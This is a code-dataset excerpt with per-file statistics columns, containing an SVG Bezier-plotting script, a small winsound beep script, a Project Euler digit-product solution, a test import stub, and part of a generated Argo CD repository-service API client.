| 0
| 0.014347
| 0.337097
| 59,514
| 1,340
| 313
| 44.413433
| 0.836054
| 0.483785
| 0
| 0.762626
| 0
| 0
| 0.168898
| 0.03571
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031987
| false
| 0
| 0.008418
| 0
| 0.072391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
18a2a05748a7d49b475f56fc1588e7ce544d68d6
| 7,736
|
py
|
Python
|
1_SVG_converter_Plus.py
|
hirowgit/2B0_python_optmization_course
|
e1890a41d0daf9a44a4d1e0a6c5d775f8ab7691b
|
[
"MIT"
] | null | null | null |
1_SVG_converter_Plus.py
|
hirowgit/2B0_python_optmization_course
|
e1890a41d0daf9a44a4d1e0a6c5d775f8ab7691b
|
[
"MIT"
] | null | null | null |
1_SVG_converter_Plus.py
|
hirowgit/2B0_python_optmization_course
|
e1890a41d0daf9a44a4d1e0a6c5d775f8ab7691b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[93]:
from svg.path import parse_path
from svg.path.path import Line
from xml.dom import minidom
import numpy as np
import matplotlib.pyplot as plt
# Learned from
# https://python5.com/q/twovjmxc
# In[54]:
# read the SVG file
doc = minidom.parse('B_sample.svg')
path_strings = [path.getAttribute('d') for path
in doc.getElementsByTagName('path')]
doc.unlink()
# In[55]:
path_strings
# In[56]:
path_strings[0]
# In[57]:
parse_path(path_strings[0])
# In[59]:
for path_string in path_strings:
path = parse_path(path_string)
for e in path:
if type(e).__name__ == 'Line':
x0 = e.start.real
y0 = e.start.imag
x1 = e.end.real
y1 = e.end.imag
print("(%.2f, %.2f) - (%.2f, %.2f)" % (x0, y0, x1, y1))
# In[61]:
path=parse_path(path_strings[0])
key=0
path[key]
# In[62]:
type(path[key]).__name__
# In[63]:
path[key].start.real
# In[64]:
path[key].start.imag
# In[65]:
key=1
path[key]
# In[66]:
type(path[key]).__name__
# In[67]:
path[key].start.real
# In[68]:
path[key].start.imag
# In[72]:
def cubic_bezier_converter(start, control1, control2, end):
original_data = np.array([start, control1, control2, end])
cubic_bezier_matrix = np.array([
[-1, 3, -3, 1],
[ 3, -6, 3, 0],
[-3, 3, 0, 0],
[ 1, 0, 0, 0]
])
return_data = cubic_bezier_matrix.dot(original_data)
return (lambda t: np.array([t**3, t**2, t, 1]).dot(return_data))
# Learned from
# https://stackoverflow.com/questions/36971363/how-to-interpolate-svg-path-into-a-pixel-coordinates-not-simply-raster-in-pyth
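# A quick sanity check of the matrix form above (added under the assumption of
# 2-D control points): a cubic Bezier interpolates its endpoints, so the
# returned curve must satisfy curve(0) == start and curve(1) == end.
_check_curve = cubic_bezier_converter(np.array([0.0, 0.0]), np.array([1.0, 2.0]), np.array([3.0, 2.0]), np.array([4.0, 0.0]))
assert np.allclose(_check_curve(0.0), [0.0, 0.0])  # t=0 hits the start point
assert np.allclose(_check_curve(1.0), [4.0, 0.0])  # t=1 hits the end point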
# In[83]:
block=0
n_dots=100
key=0
path=parse_path(path_strings[block])
dat=path[key]
if type(path[key]).__name__=='CubicBezier':
start_np = np.array([dat.start.real, dat.start.imag])
control1_np = np.array([dat.control1.real, dat.control1.imag])
control2_np = np.array([dat.control2.real, dat.control2.imag])
end_np = np.array([dat.end.real, dat.end.imag])
converted_curve = cubic_bezier_converter(start_np, control1_np, control2_np, end_np)
points_np = np.array([converted_curve(t) for t in np.linspace(0, 1, n_dots)])
# == plot the line==
controls_np = np.array([start_np, control1_np, control2_np, end_np])
# curve drawing
plt.plot(points_np[:, 0], points_np[:, 1], '-')
# showing of control points
plt.plot(controls_np[:,0], controls_np[:,1], 'o')
# control line drawing
plt.plot([start_np[0], control1_np[0]], [start_np[1], control1_np[1]], '-', lw=1)
plt.plot([control2_np[0], end_np[0]], [control2_np[1], end_np[1]], '-', lw=1)
plt.show()
# In[84]:
block=0
n_dots=100
key=1
path=parse_path(path_strings[block])
dat=path[key]
if type(path[key]).__name__=='CubicBezier':
start_np = np.array([dat.start.real, dat.start.imag])
control1_np = np.array([dat.control1.real, dat.control1.imag])
control2_np = np.array([dat.control2.real, dat.control2.imag])
end_np = np.array([dat.end.real, dat.end.imag])
converted_curve = cubic_bezier_converter(start_np, control1_np, control2_np, end_np)
points_np = np.array([converted_curve(t) for t in np.linspace(0, 1, n_dots)])
# == plot the line==
controls_np = np.array([start_np, control1_np, control2_np, end_np])
# curve drawing
plt.plot(points_np[:, 0], points_np[:, 1], '-')
# showing of control points
plt.plot(controls_np[:,0], controls_np[:,1], 'o')
# control line drawing
plt.plot([start_np[0], control1_np[0]], [start_np[1], control1_np[1]], '-', lw=1)
plt.plot([control2_np[0], end_np[0]], [control2_np[1], end_np[1]], '-', lw=1)
plt.show()
# In[85]:
block=0
n_dots=100
key=2
path=parse_path(path_strings[block])
dat=path[key]
if type(path[key]).__name__=='CubicBezier':
start_np = np.array([dat.start.real, dat.start.imag])
control1_np = np.array([dat.control1.real, dat.control1.imag])
control2_np = np.array([dat.control2.real, dat.control2.imag])
end_np = np.array([dat.end.real, dat.end.imag])
converted_curve = cubic_bezier_converter(start_np, control1_np, control2_np, end_np)
points_np = np.array([converted_curve(t) for t in np.linspace(0, 1, n_dots)])
# == plot the line==
controls_np = np.array([start_np, control1_np, control2_np, end_np])
# curve drawing
plt.plot(points_np[:, 0], points_np[:, 1], '-')
# showing of control points
plt.plot(controls_np[:,0], controls_np[:,1], 'o')
# control line drawing
plt.plot([start_np[0], control1_np[0]], [start_np[1], control1_np[1]], '-', lw=1)
plt.plot([control2_np[0], end_np[0]], [control2_np[1], end_np[1]], '-', lw=1)
plt.show()
# In[86]:
block=0
n_dots=100
key=3
path=parse_path(path_strings[block])
dat=path[key]
if type(path[key]).__name__=='CubicBezier':
start_np = np.array([dat.start.real, dat.start.imag])
control1_np = np.array([dat.control1.real, dat.control1.imag])
control2_np = np.array([dat.control2.real, dat.control2.imag])
end_np = np.array([dat.end.real, dat.end.imag])
converted_curve = cubic_bezier_converter(start_np, control1_np, control2_np, end_np)
points_np = np.array([converted_curve(t) for t in np.linspace(0, 1, n_dots)])
# == plot the line==
controls_np = np.array([start_np, control1_np, control2_np, end_np])
# curve drawing
plt.plot(points_np[:, 0], points_np[:, 1], '-')
# showing of control points
plt.plot(controls_np[:,0], controls_np[:,1], 'o')
# control line drawing
plt.plot([start_np[0], control1_np[0]], [start_np[1], control1_np[1]], '-', lw=1)
plt.plot([control2_np[0], end_np[0]], [control2_np[1], end_np[1]], '-', lw=1)
plt.show()
# In[87]:
block=0
n_dots=100
key=4
path=parse_path(path_strings[block])
dat=path[key]
if type(path[key]).__name__=='CubicBezier':
start_np = np.array([dat.start.real, dat.start.imag])
control1_np = np.array([dat.control1.real, dat.control1.imag])
control2_np = np.array([dat.control2.real, dat.control2.imag])
end_np = np.array([dat.end.real, dat.end.imag])
converted_curve = cubic_bezier_converter(start_np, control1_np, control2_np, end_np)
points_np = np.array([converted_curve(t) for t in np.linspace(0, 1, n_dots)])
# == plot the line==
controls_np = np.array([start_np, control1_np, control2_np, end_np])
# curve drawing
plt.plot(points_np[:, 0], points_np[:, 1], '-')
# showing of control points
plt.plot(controls_np[:,0], controls_np[:,1], 'o')
# control line drawing
plt.plot([start_np[0], control1_np[0]], [start_np[1], control1_np[1]], '-', lw=1)
plt.plot([control2_np[0], end_np[0]], [control2_np[1], end_np[1]], '-', lw=1)
plt.show()
# In[98]:
diff_np = start_np - end_np
n_dots = int(np.round(np.linalg.norm(diff_np)))  # dot count from the chord length (int for np.linspace); overridden by the fixed n_dots below
block=0
n_dots=100
key=3
path=parse_path(path_strings[block])
dat=path[key]
if type(path[key]).__name__=='CubicBezier':
start_np = np.array([dat.start.real, dat.start.imag])
control1_np = np.array([dat.control1.real, dat.control1.imag])
control2_np = np.array([dat.control2.real, dat.control2.imag])
end_np = np.array([dat.end.real, dat.end.imag])
converted_curve = cubic_bezier_converter(start_np, control1_np, control2_np, end_np)
points_np = np.array([converted_curve(t) for t in np.linspace(0, 1, n_dots)])
# == plot the line==
controls_np = np.array([start_np, control1_np, control2_np, end_np])
# curve drawing
plt.plot(points_np[:, 0], points_np[:, 1], '-')
# showing of control points
plt.plot(controls_np[:,0], controls_np[:,1], 'o')
# control line drawing
plt.plot([start_np[0], control1_np[0]], [start_np[1], control1_np[1]], '-', lw=1)
plt.plot([control2_np[0], end_np[0]], [control2_np[1], end_np[1]], '-', lw=1)
plt.show()
# In[ ]:
| 23.950464
| 125
| 0.666882
| 1,294
| 7,736
| 3.779753
| 0.1051
| 0.055817
| 0.066244
| 0.058884
| 0.810468
| 0.779391
| 0.765488
| 0.765488
| 0.765488
| 0.757514
| 0
| 0.045834
| 0.148268
| 7,736
| 322
| 126
| 24.024845
| 0.696464
| 0.11789
| 0
| 0.756579
| 0
| 0
| 0.020393
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.032895
| null | null | 0.006579
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
18c0f8ab989cf3a9cb0ce31834a492c42eec765a
| 139
|
py
|
Python
|
jupyterlab_autoversion/tests/test_all.py
|
ceball/jupyterlab_autoversion
|
d337436e5e7573af71bc0cd111a72955126458f0
|
[
"Apache-2.0"
] | 60
|
2018-08-30T02:07:57.000Z
|
2022-03-03T15:00:39.000Z
|
jupyterlab_autoversion/tests/test_all.py
|
ceball/jupyterlab_autoversion
|
d337436e5e7573af71bc0cd111a72955126458f0
|
[
"Apache-2.0"
] | 61
|
2018-08-24T22:55:48.000Z
|
2022-03-30T13:07:48.000Z
|
jupyterlab_autoversion/tests/test_all.py
|
ceball/jupyterlab_autoversion
|
d337436e5e7573af71bc0cd111a72955126458f0
|
[
"Apache-2.0"
] | 8
|
2019-03-03T07:29:17.000Z
|
2022-03-30T12:38:59.000Z
|
# for Coverage
from jupyterlab_autoversion import * # noqa: F401, F403
from jupyterlab_autoversion.extension import * # noqa: F401, F403
| 34.75
| 66
| 0.776978
| 17
| 139
| 6.235294
| 0.588235
| 0.264151
| 0.471698
| 0.339623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101695
| 0.151079
| 139
| 3
| 67
| 46.333333
| 0.79661
| 0.330935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e1310296094d4f0bb4853aafaee0f2cf228fc20c
| 431
|
py
|
Python
|
Random Codes/import winsound.py
|
rafaelleitedasilva/Python
|
2fbd450bdfd770a2bd0f0fd65d667a1b5b4d30d9
|
[
"MIT"
] | null | null | null |
Random Codes/import winsound.py
|
rafaelleitedasilva/Python
|
2fbd450bdfd770a2bd0f0fd65d667a1b5b4d30d9
|
[
"MIT"
] | null | null | null |
Random Codes/import winsound.py
|
rafaelleitedasilva/Python
|
2fbd450bdfd770a2bd0f0fd65d667a1b5b4d30d9
|
[
"MIT"
] | null | null | null |
import winsound
b=winsound.Beep
x = winsound.Beep  # winsound has no 'Scrach' attribute; Beep(frequency_hz, duration_ms) is assumed to be the intended call
x(100, 1000)
b(1000,100)
b(700,100)
b(500,100)
b(300,100)
b(700,100)
b(100,100)
b(1000,100)
b(700,100)
b(500,100)
b(300,100)
b(200,100)
b(100,100)
b(1000,100)
b(700,100)
b(500,100)
b(300,100)
b(200,100)
b(100,100)
b(1000,100)
b(700,100)
b(500,100)
b(500,100)
b(200,100)
b(100,100)
b(1000,100)
b(700,100)
b(500,100)
b(300,100)
b(200,100)
b(3000,100)
| 12.676471
| 18
| 0.617169
| 101
| 431
| 2.633663
| 0.128713
| 0.43609
| 0.157895
| 0.225564
| 0.785714
| 0.763158
| 0.763158
| 0.763158
| 0.763158
| 0.763158
| 0
| 0.53168
| 0.157773
| 431
| 34
| 19
| 12.676471
| 0.201102
| 0
| 0
| 0.852941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.029412
| 0
| 0.029412
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e1ab6fb66b56899bf4385b65ab78fb2590571507
| 1,323
|
py
|
Python
|
e008-largest-product.py
|
bayramcicek/mini-programs
|
3f876e3274b7beeb5e7413ac9c5275813d9f0d2d
|
[
"Unlicense"
] | null | null | null |
e008-largest-product.py
|
bayramcicek/mini-programs
|
3f876e3274b7beeb5e7413ac9c5275813d9f0d2d
|
[
"Unlicense"
] | null | null | null |
e008-largest-product.py
|
bayramcicek/mini-programs
|
3f876e3274b7beeb5e7413ac9c5275813d9f0d2d
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/python3.6
# created by cicek on 12.10.2018 15:09
digits = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
d_list = list(digits)
i, res = 0, 1
product_array = []
while ((i+12) < len(d_list)):
for x in range(0, 13):
res *= int(d_list[i+x])
product_array.append(res)
res = 1
i += 1
product_array.sort()
print(product_array[-1])
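# A cross-check under the same 13-digit sliding window, kept Python-3.6
# compatible to match the shebang above (functools.reduce instead of math.prod):
from functools import reduce
print(max(reduce(lambda acc, c: acc * int(c), digits[i:i + 13], 1) for i in range(len(digits) - 12)))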
| 57.521739
| 1,011
| 0.900983
| 58
| 1,323
| 20.431034
| 0.586207
| 0.040506
| 0.021941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.820513
| 0.056689
| 1,323
| 22
| 1,012
| 60.136364
| 0.129006
| 0.042328
| 0
| 0
| 0
| 0
| 0.791139
| 0.791139
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.083333
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83601ffd91c0e7e4353a5bd329b27dbbf3b54a3b
| 49,691
|
py
|
Python
|
argocd_client/api/repository_service_api.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 1
|
2021-09-29T11:57:07.000Z
|
2021-09-29T11:57:07.000Z
|
argocd_client/api/repository_service_api.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 1
|
2020-09-09T00:28:57.000Z
|
2020-09-09T00:28:57.000Z
|
argocd_client/api/repository_service_api.py
|
thepabloaguilar/argocd-client
|
a6c4ff268a63ee6715f9f837b9225b798aa6bde2
|
[
"BSD-3-Clause"
] | 2
|
2020-10-13T18:31:59.000Z
|
2021-02-15T12:52:33.000Z
|
# coding: utf-8
"""
Consolidate Services
Description of all APIs # noqa: E501
The version of the OpenAPI document: version not set
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from argocd_client.api_client import ApiClient
from argocd_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class RepositoryServiceApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_repository(self, body, **kwargs): # noqa: E501
"""CreateRepository creates a new repository configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_repository(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param V1alpha1Repository body: Repository definition (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_repository_with_http_info(body, **kwargs) # noqa: E501
def create_repository_with_http_info(self, body, **kwargs): # noqa: E501
"""CreateRepository creates a new repository configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_repository_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param V1alpha1Repository body: Repository definition (required)
:param _return_http_data_only: return the response data only, without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1alpha1Repository, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_repository" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_repository`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1Repository', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
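# A minimal usage sketch, assuming the generated V1alpha1Repository model is
# exported at the package top level and exposes a `repo` URL attribute (both
# are assumptions about the generated package, not confirmed by this file):
#
# from argocd_client import ApiClient, V1alpha1Repository
# api = RepositoryServiceApi(ApiClient())
# created = api.create_repository(V1alpha1Repository(repo='https://github.com/org/app.git'))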
def delete_repository(self, repo, **kwargs): # noqa: E501
"""DeleteRepository deletes a repository from the configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_repository(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query (required)
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_repository_with_http_info(repo, **kwargs) # noqa: E501
def delete_repository_with_http_info(self, repo, **kwargs): # noqa: E501
"""DeleteRepository deletes a repository from the configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_repository_with_http_info(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query (required)
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _return_http_data_only: return the response data only, without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(object, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo',
'force_refresh'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_repository" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'repo' is set
if self.api_client.client_side_validation and ('repo' not in local_var_params or # noqa: E501
local_var_params['repo'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `repo` when calling `delete_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'repo' in local_var_params:
path_params['repo'] = local_var_params['repo'] # noqa: E501
query_params = []
if 'force_refresh' in local_var_params and local_var_params['force_refresh'] is not None: # noqa: E501
query_params.append(('forceRefresh', local_var_params['force_refresh'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{repo}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
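# A minimal sketch of the cache-refresh option documented above: force_refresh
# maps to the `forceRefresh` query parameter built in the method body, so
# bypassing the cached connection state is one keyword argument (`repo_url` is
# a placeholder):
#
# api.delete_repository(repo_url, force_refresh=True)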
def get_app_details(self, source_repo_url, body, **kwargs): # noqa: E501
"""GetAppDetails returns application details by given path # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_app_details(source_repo_url, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_repo_url: RepoURL is the repository URL of the application manifests (required)
:param RepositoryRepoAppDetailsQuery body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RepositoryRepoAppDetailsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_app_details_with_http_info(source_repo_url, body, **kwargs) # noqa: E501
def get_app_details_with_http_info(self, source_repo_url, body, **kwargs): # noqa: E501
"""GetAppDetails returns application details by given path # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_app_details_with_http_info(source_repo_url, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_repo_url: RepoURL is the repository URL of the application manifests (required)
:param RepositoryRepoAppDetailsQuery body: (required)
:param _return_http_data_only: return the response data only, without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RepositoryRepoAppDetailsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'source_repo_url',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_app_details" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_repo_url' is set
if self.api_client.client_side_validation and ('source_repo_url' not in local_var_params or # noqa: E501
local_var_params['source_repo_url'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `source_repo_url` when calling `get_app_details`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `get_app_details`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_repo_url' in local_var_params:
path_params['source.repoURL'] = local_var_params['source_repo_url'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{source.repoURL}/appdetails', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RepositoryRepoAppDetailsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_helm_charts(self, repo, **kwargs): # noqa: E501
"""get_helm_charts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_helm_charts(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query (required)
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RepositoryHelmChartsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_helm_charts_with_http_info(repo, **kwargs) # noqa: E501
def get_helm_charts_with_http_info(self, repo, **kwargs): # noqa: E501
"""get_helm_charts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_helm_charts_with_http_info(repo, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str repo: Repo URL for query (required)
:param bool force_refresh: Whether to force a cache refresh on repo's connection state.
:param _return_http_data_only: return the response data only, without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RepositoryHelmChartsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'repo',
'force_refresh'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_helm_charts" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'repo' is set
if self.api_client.client_side_validation and ('repo' not in local_var_params or # noqa: E501
local_var_params['repo'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `repo` when calling `get_helm_charts`") # noqa: E501
collection_formats = {}
path_params = {}
if 'repo' in local_var_params:
path_params['repo'] = local_var_params['repo'] # noqa: E501
query_params = []
if 'force_refresh' in local_var_params and local_var_params['force_refresh'] is not None: # noqa: E501
query_params.append(('forceRefresh', local_var_params['force_refresh'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repositories/{repo}/helmcharts', 'GET',
path_params,
query_params,
header_params,
